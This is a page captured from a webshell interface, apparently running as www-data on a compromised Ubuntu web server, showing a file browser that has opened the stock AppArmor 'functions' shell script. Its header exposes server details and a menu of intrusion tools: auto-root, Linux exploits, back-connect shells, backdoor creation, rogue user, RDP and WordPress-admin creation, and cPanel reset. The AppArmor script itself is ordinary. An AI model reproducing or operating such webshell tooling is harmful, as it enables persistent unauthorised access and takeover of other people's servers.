Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.145.165.39
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
lib /
apparmor /
[ HOME SHELL ]
Name
Size
Permission
Action
functions
6.85
KB
-rw-r--r--
profile-load
1.9
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : functions
# /lib/apparmor/functions for Debian -*- shell-script -*- # ---------------------------------------------------------------------- # Copyright (c) 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007 # NOVELL (All rights reserved) # Copyright (c) 2008-2018 Canonical, Ltd. # # This program is free software; you can redistribute it and/or # modify it under the terms of version 2 of the GNU General Public # License published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, contact Novell, Inc. # ---------------------------------------------------------------------- # Authors: # Kees Cook <kees@ubuntu.com> PROFILES="/etc/apparmor.d" PROFILES_CACHE="$PROFILES/cache" PARSER="/sbin/apparmor_parser" SECURITYFS="/sys/kernel/security" export AA_SFS="$SECURITYFS/apparmor" # Suppress warnings when booting in quiet mode quiet_arg="" [ "${QUIET:-no}" = yes ] && quiet_arg="-q" [ "${quiet:-n}" = y ] && quiet_arg="-q" foreach_configured_profile() { rc_all="0" for pdir in "$PROFILES" ; do if [ ! -d "$pdir" ]; then continue fi num=`find "$pdir" -type f ! -name '*.md5sums' | wc -l` if [ "$num" = "0" ]; then continue fi cache_dir="$PROFILES_CACHE" cache_args="--cache-loc=$cache_dir" if [ ! -d "$cache_dir" ]; then cache_args= fi # If need to compile everything, then use -n1 with xargs to # take advantage of -P. When cache files are in use, omit -n1 # since it is considerably faster on moderately sized profile # sets to give the parser all the profiles to load at once n1_args= num=`find "$cache_dir" -type f ! -name '.features' ! -name 'CACHEDIR.TAG' | wc -l` if [ "$num" = "0" ]; then n1_args="-n1" fi (ls -1 "$pdir" | egrep -v '(\.dpkg-(new|old|dist|bak)|~)$' | \ while read profile; do if [ -f "$pdir"/"$profile" ]; then echo "$pdir"/"$profile" fi done) | \ xargs $n1_args -d"\n" -P$(getconf _NPROCESSORS_ONLN) "$PARSER" "$@" $cache_args $cache_extra_args -- || { rc_all="$?" # FIXME: when the parser properly handles broken # profiles (LP: #1377338), remove this if statement. # For now, if the xargs returns with error, just run # through everything with -n1. (This could be broken # out and refactored, but this is temporary so make it # easy to understand and revert) if [ "$rc_all" != "0" ]; then (ls -1 "$pdir" | \ egrep -v '(\.dpkg-(new|old|dist|bak)|~)$' | \ while read profile; do if [ -f "$pdir"/"$profile" ]; then echo "$pdir"/"$profile" fi done) | \ xargs -n1 -d"\n" -P$(getconf _NPROCESSORS_ONLN) "$PARSER" "$@" $cache_args $cache_extra_args -- || { rc_all="$?" } fi } done return $rc_all } load_configured_profiles() { clear_cache_if_outdated foreach_configured_profile $quiet_arg --write-cache --replace } load_configured_profiles_without_caching() { foreach_configured_profile $quiet_arg --replace } recache_profiles() { clear_cache foreach_configured_profile $quiet_arg --write-cache --skip-kernel-load } configured_profile_names() { foreach_configured_profile $quiet_arg -N 2>/dev/null | LC_COLLATE=C sort | grep -v '//' } running_profile_names() { # Output a sorted list of loaded profiles, skipping libvirt's # dynamically generated files cat "$AA_SFS"/profiles | sed -e "s/ (\(enforce\|complain\))$//" | egrep -v '^libvirt-[0-9a-f\-]+$' | LC_COLLATE=C sort | grep -v '//' } unload_profile() { echo -n "$1" > "$AA_SFS"/.remove } clear_cache() { clear_cache_system clear_cache_var } clear_cache_system() { find "$PROFILES_CACHE" -maxdepth 1 \ -name CACHEDIR.TAG -prune -o \ -type f -print0 | xargs -0 rm -f -- } clear_cache_var() { find "$PROFILES_CACHE_VAR" -maxdepth 1 \ -name CACHEDIR.TAG -prune -o \ -type f -print0 | xargs -0 rm -f -- } read_features_dir() { for f in `ls -AU "$1"` ; do if [ -f "$1/$f" ] ; then read -r KF < "$1/$f" || true echo -n "$f {$KF } " elif [ -d "$1/$f" ] ; then echo -n "$f {" KF=`read_features_dir "$1/$f"` || true echo -n "$KF} " fi done } clear_cache_if_outdated() { if [ -r "$PROFILES_CACHE"/.features ]; then if [ -d "$AA_SFS"/features ]; then KERN_FEATURES=`read_features_dir "$AA_SFS"/features` else read -r KERN_FEATURES < "$AA_SFS"/features fi CACHE_FEATURES=`tr '\n' ' ' < "$PROFILES_CACHE"/.features` if [ "$KERN_FEATURES" != "$CACHE_FEATURES" ]; then clear_cache fi fi } unload_obsolete_profiles() { # Currently we must re-parse all the profiles to get policy names. :( aa_configured=$(mktemp -t aa-XXXXXX) configured_profile_names > "$aa_configured" || true aa_loaded=$(mktemp -t aa-XXXXXX) running_profile_names > "$aa_loaded" || true LC_COLLATE=C comm -2 -3 "$aa_loaded" "$aa_configured" | while read profile ; do unload_profile "$profile" done rm -f "$aa_configured" "$aa_loaded" } # Checks to see if the current container is capable of having internal AppArmor # profiles that should be loaded. Callers of this function should have already # verified that they're running inside of a container environment with # something like `systemd-detect-virt --container`. # # The only known container environments capable of supporting internal policy # are LXD and LXC environment. # # Returns 0 if the container environment is capable of having its own internal # policy and non-zero otherwise. # # IMPORTANT: This function will return 0 in the case of a non-LXD/non-LXC # system container technology being nested inside of a LXD/LXC container that # utilized an AppArmor namespace and profile stacking. The reason 0 will be # returned is because .ns_stacked will be "yes" and .ns_name will still match # "lx[dc]-*" since the nested system container technology will not have set up # a new AppArmor profile namespace. This will result in the nested system # container's boot process to experience failed policy loads but the boot # process should continue without any loss of functionality. This is an # unsupported configuration that cannot be properly handled by this function. is_container_with_internal_policy() { local ns_stacked_path="${AA_SFS}/.ns_stacked" local ns_name_path="${AA_SFS}/.ns_name" local ns_stacked local ns_name if ! [ -f "$ns_stacked_path" ] || ! [ -f "$ns_name_path" ]; then return 1 fi read -r ns_stacked < "$ns_stacked_path" if [ "$ns_stacked" != "yes" ]; then return 1 fi # LXD and LXC set up AppArmor namespaces starting with "lxd-" and # "lxc-", respectively. Return non-zero for all other namespace # identifiers. read -r ns_name < "$ns_name_path" if [ "${ns_name#lxd-*}" = "$ns_name" ] && \ [ "${ns_name#lxc-*}" = "$ns_name" ]; then return 1 fi return 0 }
Close
